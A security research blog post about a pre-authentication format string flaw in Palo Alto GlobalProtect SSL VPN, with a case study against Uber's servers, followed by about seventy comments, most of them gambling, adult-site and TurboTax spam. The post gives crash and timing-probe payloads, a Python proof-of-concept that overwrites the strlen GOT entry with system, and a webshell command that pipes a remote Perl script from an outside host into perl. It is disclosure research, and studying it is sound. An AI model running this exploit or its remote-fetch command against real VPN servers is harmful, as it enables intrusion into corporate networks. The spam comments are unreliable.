2019年7月17日 星期三

Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!




Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)
P.S. This is a cross-post blog from DEVCORE




SSL VPNs protect corporate assets from Internet exposure, but what if SSL VPNs themselves are vulnerable? They’re exposed to the Internet, trusted to reliably guard the only way to your intranet. Once the SSL VPN server is compromised, attackers can infiltrate your Intranet and even take over all users connecting to the SSL VPN server! Due to its importance, in the past several months, we started a new research on the security of leading SSL VPN products.

We plan to publish our results on 3 articles. We put this as the first one because we think this is an interesting story and is very suitable as an appetizer of our Black Hat USA and DEFCON talk:
  • Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!

Don’t worry about the spoilers, this story is not included in our BHUSA/DEFCON talks.

In our incoming presentations, we will provide more hard-core exploitations and crazy bugs chains to hack into your SSL VPN. From how we jailbreak the appliance and what attack vectors we are focusing on. We will also demonstrate gaining root shell from the only exposed HTTPS port, covertly weaponizing the server against their owner, and abusing a hidden feature to take over all VPN clients! So please look forward to it ;)

The story


In this article, we would like to talk about the vulnerability on Palo Alto SSL VPN. Palo Alto calls their SSL VPN product line as GlobalProtect. You can easily identify the GlobalPortect service via the 302 redirection to /global-protect/login.esp on web root!

About the vulnerability, we accidentally discovered it during our Red Team assessment services. At first, we thought this is a 0day. However, we failed reproducing on the remote server which is the latest version of GlobalProtect. So we began to suspect if this is a known vulnerability.

We searched all over the Internet, but we could not find anything. There is no public RCE exploit before[1], no official advisory contains anything similar and no CVE. So we believe this must be a silent-fix 1-day!


[1] There are some exploit about the Pan-OS management interface before such as the CVE-2017-15944 and the excellent Troppers16 paper by @_fel1x, but unfortunately, they are not talking about the GlobalProtect and the management interface is only exposed to the LAN port

The bug


The bug is very straightforward. It is just a simple format string vulnerability with no authentication required! The sslmgr is the SSL gateway handling the SSL handshake between the server and clients. The daemon is exposed by the Nginx reverse proxy and can be touched via the path /sslmgr.

$ curl https://global-protect/sslmgr
<?xml version="1.0" encoding="UTF-8" ?>
        <clientcert-response>
                <status>error</status>
                <msg>Invalid parameters</msg>
        </clientcert-response>


During the parameter extraction, the daemon searches the string scep-profile-name and pass its value as the snprintf format to fill in the buffer. That leads to the format string attack. You can just crash the service with %n!

POST /sslmgr HTTP/1.1
Host: global-protect
Content-Length: 36

scep-profile-name=%n%n%n%n%n...

Affect versions


According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:
  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

The series 9.x and 7.0.x are not affected by this vulnerability.

How to verify the bug


Although we know where the bug is, to verify the vulnerability is still not easy. There is no output for this format string so that we can’t obtain any address-leak to verify the bug. And to crash the service is never our first choice[1]. In order to avoid crashes, we need to find a way to verify the vulnerability elegantly!

By reading the snprintf manual, we choose the %c as our gadget! When there is a number before the format, such as %9999999c, the snprintf repeats the corresponding times internally. We observe the response time of large repeat number to verify this vulnerability!

$ time curl -s -d 'scep-profile-name=%9999999c' https://global-protect/sslmgr >/dev/null
real    0m1.721s
user    0m0.037s
sys     0m0.005s
$ time curl -s -d 'scep-profile-name=%99999999c' https://global-protect/sslmgr >/dev/null
real    0m2.051s
user    0m0.035s
sys     0m0.012s
$ time curl -s -d 'scep-profile-name=%999999999c' https://global-protect/sslmgr >/dev/null
real    0m5.324s
user    0m0.021s
sys     0m0.018s

As you can see, the response time increases along with the number of %c. So, from the time difference, we can identify the vulnerable SSL VPN elegantly!


[1] Although there is a watchdog monitoring the sslmgr daemon, it’s still improper to crash a service!

The exploitation


Once we can verify the bug, the exploitation is easy. To exploit the binary successfully, we need to determine the detail version first. We can distinguish by the Last-Modified header, such as the /global-protect/portal/css/login.css from 8.x version and the /images/logo_pan_158.gif from 7.x version!

$ curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified
Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT


With a specified version, we can write our own exploit now. We simply modified the pointer of strlen on the Global Offset Table(GOT) to the Procedure Linkage Table(PLT) of system. Here is the PoC:

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)


Once the modification is done, the sslmgr becomes our webshell and we can execute commands via:

$ curl -d 'scep-profile-name=curl orange.tw/bc.pl | perl -' https://global-protect/sslmgr


We have reported this bug to Palo Alto via the report form. However, we got the following reply:

Hello Orange,

Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.

Kind regards

Hmmm, so it seems this vulnerability is known for Palo Alto, but not ready for the world!

The case study


After we awared this is not a 0day, we surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them! From our survey, Uber owns about 22 servers running the GlobalProtect around the world, here we take vpn.awscorp.uberinternal.com as an example!

From the domain name, we guess Uber uses the BYOL from AWS Marketplace. From the login page, it seems Uber uses the 8.x version, and we can target the possible target version from the supported version list on the Marketplace overview page:
  • 8.0.3
  • 8.0.6
  • 8.0.8
  • 8.0.9
  • 8.1.0

Finally, we figured out the version, it’s 8.0.6 and we got the shell back!



Uber took a very quick response and right step to fix the vulnerability and Uber gave us a detail explanation to the bounty decision:

Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.

Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!

It’s a fair decision. It’s always a great time communicating with Uber and report to their bug bounty program. We don’t care about the bounty that much, because we enjoy the whole research process and feeding back to the security community! Nothing can be better than this!


87 則留言:

  1. 作者已經移除這則留言。

    回覆刪除
  2. you got jipped on the bounty.. not saying I can talk about the implementation but think about why would anyone spin up a vpn without access to their core infra..

    回覆刪除
  3. Hi, This may be product specific. How to find such string format vuln having URL (end points) in other nginx using SSLVPN products? Please let me know.

    回覆刪除
  4. 老哥牛皮,坐等black议题

    回覆刪除
  5. 作者已經移除這則留言。

    回覆刪除
  6. 哈嘍 你好 orange團隊
    請問你們這邊能進行網站安全檢測的業務嗎
    我們這邊有幾個網站需要做安全檢測
    報酬可以按月算大概在80000-15W美元,也可以根據單量
    報酬可以更多,具體可以詳談,
    我的 telegram 是 @yyue819
    或者skype也是 yyue819
    有興趣的話,可以和我聯絡,謝謝
    請問你們有聯絡方式嗎,我也可以加你們

    真誠與您期待合作,共同發展

    hello orange team
    May I ask if you can conduct website security inspection
    We have several websites here that need to be tested for security
    The pay can be anywhere from $8 0000to $150000 per month, or depending on the unit
    The compensation can be more, and it can be discussed in detail,
    my telegram is @yyue819 and skype is yyue819
    If you are interested, please contact me. Thank you

    Sincerely look forward to cooperation and common development with you,and make money

    回覆刪除
  7. how u execute that python code >?can u plz go one more step ahead for this line"With a specified version, we can write our own exploit now. We simply modified the pointer of strlen on the Global Offset Table(GOT) to the Procedure Linkage Table(PLT) of system. Here is the PoC:"

    回覆刪除
  8. Great article with excellent idea! I have bookmarked your site since this site contains important data in it. I am truly content with articles quality and introduction.

    사설토토
    카지노사이트
    파워볼
    온라인카지노

    回覆刪除
  9. I would like to thnkx for the efforts you have put in writing this blog. I am hoping the same high-grade blog post from you in the upcoming as well. In fact your creative writing abilities has inspired me to get my own blog now. Really the blogging is spreading its wings quickly. Your write up is a good example of it. 토토

    回覆刪除
  10. Hello, I’m happy to see some great articles on your site. Would you like to come to my site later? My site also has posts, comments and communities similar to yours. Please visit and take a look 경마사이트

    回覆刪除
  11. Hi there! I could have sworn I’ve been to this site before but after browsing through some of the articles I realized it’s new to me.
    Nonetheless, I’m certainly happy I came across it and I’ll be bookmarking it
    and checking back regularly! 온라인카지노

    回覆刪除
  12. I am really impressed with your blog article, such great & useful information you mentioned here. I have read all your posts and all are very informative. Thanks for sharing and keep it up like this. 토토

    回覆刪除
  13. Great blog here! Additionally your website quite a bit up very fast! What web host are you the use of? Can I am getting your affiliate hyperlink on your host? 야한동영상

    回覆刪除
  14. ! What web host are you the use of? Can I am getting your affiliate hyperlink on your host?

    Whoah this weblog is great i like studying your articles. Keep up the good work! You already know, a lot of people are searching around for this information, you could aid them great!

    일본야동

    回覆刪除
  15. Hard to ignore such an amazing article like this. You really amazed me with your writing talent. Thank you for sharing again
    국산야동

    回覆刪除
  16. Great blog here! Additionally your website quite a bit up very fast! What web host are you the use of? Can I am getting your affiliate hyperlink on your host? 일본야동

    回覆刪除
  17. Whoah this weblog is great i like studying your articles. Keep up the good work! You already know, a lot of people are searching around for this information, you could aid them great!
    야설

    回覆刪除
  18. Hard to ignore such an amazing article like this. You really amazed me with your writing talent. Thank for you shared again.

    카지노사이트

    回覆刪除
  19. Wow! This can be one particular of the most beneficial blogs We have ever arrive across on this subject. 슬롯머신

    回覆刪除
  20. Easily this fabulous website may perhaps irrefutably be well-known within many blog persons, a result of the conscientious articles or reviews or perhaps opinions.

    사설토토
    카지노사이트
    파워볼
    온라인카지노

    回覆刪除
  21. Wonderful article, thank you for sharing the info. It isn’t too often that you simply read articles where the poster understands what they’re blogging about.

    스포츠토토
    안전놀이터
    토토사이트

    回覆刪除
  22. Right away this website will probably unquestionably usually become well known with regards to most of website customers, as a result of meticulous accounts and in addition tests.

    스포츠토토
    카지노사이트
    파워볼게임
    바카라

    回覆刪除
  23. It's the same topic , but I was quite surprised to see the opinions I didn't think of. My blog also has articles on these topics, so I look forward to your visit.baccarat

    回覆刪除
  24. Good morning!! I am also blogging with you. In my blog, articles related to are mainly written, and they are usually called 우리카지노. If you are curious about , please visit!!

    回覆刪除
  25. Wow, amazing blog format! How long have you been blogging for? you make blogging look easy. The total look of your site is wonderful, let alone the content material! ufa

    回覆刪除
  26. Hello ! I am the one who writes posts on these topics메가슬롯 I would like to write an article based on your article. When can I ask for a review?


    回覆刪除
  27. You made some good points there. I did a Google search about the topic and found most people will believe your blog. kèo nhà cái

    回覆刪除
  28. Are you the one who studies this subject?? I have a headache with this subject. 우리카지노 Looking at your writing was very helpful.

    回覆刪除
  29. Hello, I read the post well. 안전놀이터추천 It's a really interesting topic and it has helped me a lot. In fact, I also run a website with similar content to your posting. Please visit once

    回覆刪除
  30. Pretty nice post. I just stumbled upon your weblog and wanted to say that I have really enjoyed browsing your blog posts. After all I’ll be subscribing to your feed and I hope you write again soon 먹튀검증업체 I would like to write an article based on your article. When can I ask for a review?!

    回覆刪除
  31. Thank you so much for such a well-written article. It’s full of insightful information. Your point of view is the best among many without fail.For certain, It is one of the best blogs in my opinion. 먹튀검증


    回覆刪除
  32. you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa buat logo murah

    回覆刪除
  33. As the Internet develops further in the future, I think we need to collect materials that people might be interested in. Among the data to be collected, your 메가슬롯 will also be included.

    回覆刪除
  34. I really enjoy your web’s topic. Very creative and friendly for users. Definitely bookmark this and follow it everyday. 릴게임

    回覆刪除
  35. It is my first visit to your blog, and I am very impressed with the articles that you serve. Give adequate knowledge for me. Thank you for sharing useful material. I will be back for the more great post. 먹튀검증사이트 But by chance looking at your post solved my problem! I will leave my blog, so when would you like to visit it?!

    回覆刪除
  36. My curiosity was solved by looking at your writing. Your writing was helpful to me. 룰렛사이트 I want to help you too.

    回覆刪除
  37. สล็อตโจ๊กเกอร์ เว็บไซต์ สล็อต ที่มีโบนัส เครดิตฟรีในตัวเกม ดาวน์โหลด Joker ได้ง่ายๆ ผ่านโทรศัพท์มือถือหรือคอมพิวเตอร์
    สามารถ ทดลองเล่นสล็อต ได้ทั้งในระบบ Android และ iOS

    回覆刪除
  38. The more rows you select, the more The chances of pg888th
    winning big money with Roma are even greater. It is an online slot game that is very popular to play. There are full rewards and bonuses. Jackpots usually offer an opportunity

    回覆刪除
  39. superslot เกมสล็อตออนไลน์ เว็บตรงที่ดีที่สุดมีเกมสล็อตที่แตกง่ายที่สุดให้ท่านได้เลือกเล่นมากมาย ทดลองเล่นสล็อต ทุกค่ายเกม
    อาทิ PG SLOT , EVOPLAY , SLOTXO , PRAGMATIC PLAY , JILI GAME , RELAX GAMING , DAFABET , JOKER เราชื่อเว็บสล็อตเว็บตรงที่ให้บริการไม่ผ่าน agent สมัครซุปเปอร์สล็อต

    回覆刪除
  40. สล็อตโจ๊กเกอร์ ไปสนุกกับเกมสล็อตออนไลน์ ไปพร้อมๆกับความสนุกจากเว็บ สล็อต เว็บสล็อตออนไลน์ที่มีมากกว่าเกมสล็อต
    ที่จะพาผู้เล่นไปพบกับความเป็นที่สุดของที่สุดในสายคาสิโน สามารถ ทดลองเล่นสล็อต ได้แล้ววันนี้ทั้งในระบบ Android และ iOS

    回覆刪除
  41. I'm looking for a lot of data on this topic. The article I've been looking for in the meantime is the perfect article. Please visit my site for more complete articles with him! 메이저검증

    回覆刪除
  42. I like the helpful info you provide in your articles. I’ll bookmark your blog and check again here frequently. I’m quite sure I’ll learn plenty of new stuff right here! Good luck for the next. 먹튀검증업체

    回覆刪除
  43. Howdy! Do you know if they make any plugins to assist with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results. If you know of any please share. Cheers! 안전토토사이트

    回覆刪除
  44. If you want to use a safety site, please contact the Safety Site Promotion Agency now. It will be a choice you will never regret. 슬롯커뮤니티

    回覆刪除
  45. That's a really impressive new idea! 메이저토토사이트추천 It touched me a lot. I would love to hear your opinion on my site. Please come to the site I run once and leave a comment. Thank you.

    回覆刪除
  46. Hello
    Thank you for giving me useful information.
    Please keep posting good information in the future
    I will visit you often. 레플리카 쇼핑몰Thank you.
    I am also running the site. This is a related site, so please visit once.안전놀이터
    Have a niceday!

    回覆刪除
  47. I like the helpful info you provide in your articles. I’ll bookmark your blog and check again here frequently. I’m quite sure I’ll learn plenty of new stuff right here! Good luck for the next. 스포츠토토

    回覆刪除
  48. While looking for articles on these topics, I came across this article on the site here. As I read your article, I felt like an expert in this field. I have several articles on these topics posted on my site. Could you please visit my homepage? 메이저놀이터순위

    回覆刪除
  49. ufabet168 เว็บแทงบอลออนไลน์ ที่ได้มาตรฐานระดับโลก เว็บที่ดีที่สุดในประเทศไทย แทงบอลออนไลน์ คาสิโน บาคาร่า สล๊อต

    回覆刪除
  50. ที่สุดแห่ง พนันออนไลน์ biobetgaming บริการตลอด 24 ชั่วโมง บริการด้านเกมคาสิโนหลากหลายเช่น บาคาร่าออนไลน์ รูเร็ท แบล็คแจ็ค เสือมังกร ไฮโล และอื่นๆอีกมากมาย ที่มาพร้อมกับโปรโมชั่นโดนใจเน้นๆ ที่นี่ที่

    回覆刪除
  51. Thanks for Nice and Informative Post. This article is really contains lot more information about This Topic. Feel free to visit my website;

    Sign up for free. Easy to apply at this link: 카지노사이트
    바카라사이트
    온라인카지노
    호텔카지노

    回覆刪除
  52. The Wells Fargo card activation process is very simple and easy. It benefits you in many ways including cash back, extra credit points and free gifts.Visit the official Wells Fargo card activation website, wellsfargo.com/activecard .



    回覆刪除
  53. We have the resources and support you will need. Download and to enjoy your tax return services. For downloading and install turbotax with license code first you need to register yourself with Turbotax. Turbotax Canada The registration process of TurboTax software involves some time.

    回覆刪除
  54. You need to fill up the online registration form completely. Turbotax Canada If you obtained the TurboTax CD from an authorized retailer, your license code is printed on the front of the insert in your box.

    回覆刪除
  55. If you obtained the TurboTax CD directly from your license code is printed on the packing slip. Install TurboTax with license code If you obtained the TurboTax CD through TurboTax Advantage, your license code is printed on the envelope. visit here.

    回覆刪除
  56. Turbotax.ca/download is a plan of software application, which assists to take care of income tax returns. Intuit generates it. turbotax.ca/download It is just one of the top leading software which allows regulating the income tax returns.

    回覆刪除
  57. TurboTax CD/Download lets you download and install TurboTax on your personal computer. turbotax.ca/download You'll be able work on your taxes, even if you're not connected to the Internet.

    回覆刪除
  58. Your information will be stored on your hard drive. turbotax.ca/download includes the tax preparation fee for one state (state tax prep is an additional cost with TurboTax Basic and Business).

    回覆刪除
  59. It also allows you to prepare and print unlimited federal tax returns, and e-file up to five at no charge (additional fee per state e-file with TurboTax CD/Download). turbotax.ca/download Printers are one of the easiest devices to set up and configure.

    回覆刪除
  60. If you’ve used any Intuit products before, like QuickBooks, Mint, or Lacerte Tax, you must be aware of its intuitive ease of service.Install turbotax.com with the license code Let's get started with the process to Install turbotax.com with the license code here.

    回覆刪除
  61. turbotax.ca/download TurboTax is pretty useful, as it makes the complicated process easy.

    回覆刪除
  62. When you make a purchase of the software you need to install and activate turbotax from turbotax.ca/download If you don’t already have one then here is how you can generate with ease.

    回覆刪除
  63. TurboTax Canada is the number #1 tax preparation software in Canada as it makes complicated tax season a breeze. The software comprises of different features and tools that help in the automatic preparation and filing of tax. It also prompts the necessary updates and notifies the time of tax payment. With all these functionalities integrated, makes TurboTax even more useful. TurboTax is pretty useful, as it makes the complicated process easy. When you make a purchase of the software you turbotax.ca/download to activate the program. If you don’t already have one then here is how you can generate with ease.

    回覆刪除
  64. Sign in to My Downloads at Install turbotax with license code. Install turbotax with the license code Click on the download arrow beside the product you wish to install.

    回覆刪除
  65. For downloading and install turbotax with license code first you need to register yourself with Turbotax. Install turbotax with the license code The registration process of TurboTax software involves some time.You need to fill up the online registration form completely.

    回覆刪除
  66. If you download and Installturbotax.com with. To installturbotax.com with license code , follow the steps below. Install turbotax with the license code Initiate by closing all programs running on your system and putting your TurboTax CD into the optical drive in your system (desktop or laptop) When the CD/DVD drive is inserted, it starts the installation automatically, which leaves you installing TurboTax effortlessly. Registering TurboTax. The registration process of TurboTax software involves some time.

    回覆刪除
  67. turbotax.ca/download It is one of the top software that allows you to control your income tax returns. is really a tax free preparation software that coaches you to process and file your earnings in the appropriate method.

    回覆刪除
  68. Go to to sign in or create an account, and then enter your activation code (even if you've already started your taxes for tax year 2020, you’ll still need to activate the code). Also, registration makes worthy of special offers, product updates, and advance purchases.

    回覆刪除
  69. It is recognized for its clean and comfy interface for individuals. turbotax.ca/download The application executes like an interview;

    回覆刪除
  70. Although TurboTax needs no introduction as we are the best selling software across Canada because we have every situation covered; assisting our customers’ personal taxation needs. install turbotax with license code Let’s explain the details of all aspects of our software and support options.

    回覆刪除